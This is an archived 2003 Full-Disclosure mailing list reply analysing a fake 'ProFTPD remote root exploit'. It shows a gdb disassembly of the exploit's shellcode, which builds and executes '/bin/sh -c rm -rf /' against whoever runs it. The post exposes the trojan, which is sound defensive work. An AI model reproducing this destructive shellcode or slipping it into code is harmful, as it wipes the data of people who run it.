lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20031024152758.GA8424@netnation.com>
From: sim at netnation.com (Simon Kirby)
Subject: ProFTPD-1.2.9rc2 remote root exploit

On Fri, Oct 24, 2003 at 03:36:17PM +0200, Andreas Gietl wrote:

> On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote:
> 
> this seems to delete sth on the local harddisk. anybody else seeing this 
> effect?

(gdb) disassemble &sc
Dump of assembler code for function sc:
0x0804a1a0 <sc+0>:      xor    %eax,%eax
0x0804a1a2 <sc+2>:      push   %eax
0x0804a1a3 <sc+3>:      push   $0x582f2066
0x0804a1a8 <sc+8>:      push   $0x722d206d
0x0804a1ad <sc+13>:     push   $0x7258632d
0x0804a1b2 <sc+18>:     push   $0x41414141
0x0804a1b7 <sc+23>:     push   $0x41414141
0x0804a1bc <sc+28>:     push   $0x41414141
0x0804a1c1 <sc+33>:     push   $0x41414141
0x0804a1c6 <sc+38>:     push   $0x4368732f
0x0804a1cb <sc+43>:     push   $0x6e69622f
0x0804a1d0 <sc+48>:     xor    %eax,%eax
0x0804a1d2 <sc+50>:     mov    %al,0x7(%esp,1)
0x0804a1d6 <sc+54>:     mov    %al,0x1a(%esp,1)
0x0804a1da <sc+58>:     mov    %al,0x23(%esp,1)
0x0804a1de <sc+62>:     mov    %esp,0x8(%esp,1)
0x0804a1e2 <sc+66>:     xor    %ebx,%ebx
0x0804a1e4 <sc+68>:     lea    0x18(%esp,1),%ebx
0x0804a1e8 <sc+72>:     mov    %ebx,0xc(%esp,1)
0x0804a1ec <sc+76>:     xor    %ebx,%ebx
0x0804a1ee <sc+78>:     lea    0x1b(%esp,1),%ebx
0x0804a1f2 <sc+82>:     mov    %ebx,0x10(%esp,1)
0x0804a1f6 <sc+86>:     mov    %eax,0x14(%esp,1)
0x0804a1fa <sc+90>:     xor    %ebx,%ebx
0x0804a1fc <sc+92>:     mov    %esp,%ebx
0x0804a1fe <sc+94>:     lea    0x8(%esp,1),%ecx
0x0804a202 <sc+98>:     xor    %edx,%edx
0x0804a204 <sc+100>:    lea    0x14(%esp,1),%edx
0x0804a208 <sc+104>:    mov    $0xb,%al
0x0804a20a <sc+106>:    int    $0x80
0x0804a20c <sc+108>:    xor    %ebx,%ebx
0x0804a20e <sc+110>:    xor    %eax,%eax
0x0804a210 <sc+112>:    inc    %eax
0x0804a211 <sc+113>:    int    $0x80
0x0804a213 <sc+115>:    add    %al,(%eax)
End of assembler dump.

Demangles "rm -rf /" and execs it?

Simon-

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ